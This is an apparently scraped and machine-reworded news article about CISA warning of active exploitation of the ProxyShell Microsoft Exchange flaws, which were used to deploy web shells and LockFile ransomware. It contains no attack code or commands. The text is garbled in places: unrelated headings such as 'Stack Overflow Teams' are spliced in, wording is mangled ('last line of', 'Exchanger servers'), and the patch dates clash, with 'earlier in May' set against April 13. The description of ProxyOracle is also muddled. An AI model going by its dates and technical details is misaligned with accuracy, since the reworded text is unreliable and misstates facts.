Microsoft Exchange attacked with ProxyShell flaws

by



[ad_1]

ProxyShell faults

The US Agency for Cybersecurity and Infrastructure Security warns of active exploitation attempts that take advantage of the last line of “ProxyShell“Microsoft Exchange vulnerabilities that were patched earlier in May, including the deployment of LockFile ransomware on compromised systems.

Tracked under the names CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, the vulnerabilities allow adversaries to bypass ACL controls, elevate privileges on the Exchange PowerShell backend, thus allowing attacker execute unauthenticated remote code. While the first two were processed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows manufacturer’s Patch Tuesday updates.

Stack Overflow Teams

“An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,” CISA said.

The development comes just over a week after cybersecurity researchers sounded the alarm bells about the opportunistic analysis and exploitation of unpatched Exchange servers by leveraging the ProxyShell attack chain.

Originally showcased at the Pwn2Own hacking contest in April this year, ProxyShell is one of a larger trio of exploitation chains discovered by DEVCORE security researcher Orange Tsai which includes ProxyLogon and ProxyOracle, the latter concerning two remote code execution flaws that could be used to retrieve a user’s password in plain text format.

“These are stolen boxes with webshells that delete other webshells and also executables that call periodically”, researcher Kevin Beaumont Noted Last week.

Prevent ransomware attacks

According to researchers at Huntress Labs, at least five distinct styles of web shells have been observed deployed on vulnerable Microsoft Exchange servers, with more than 100 incidents reported related to the exploit between August 17 and August 18. Web shells grant attackers remote access. to compromised servers, but it is unclear exactly what the goals are or to what extent any vulnerabilities have been used.

Over 140 web shells have been detected on as many as 1,900 unpatched Exchanger servers to date, Kyle Hanslovan, CEO of Huntress Labs. tweeted, adding “impacted [organizations] so far include building fabrication, seafood processors, industrial machinery, auto repair shops, small residential airport and more. “



[ad_2]

Source link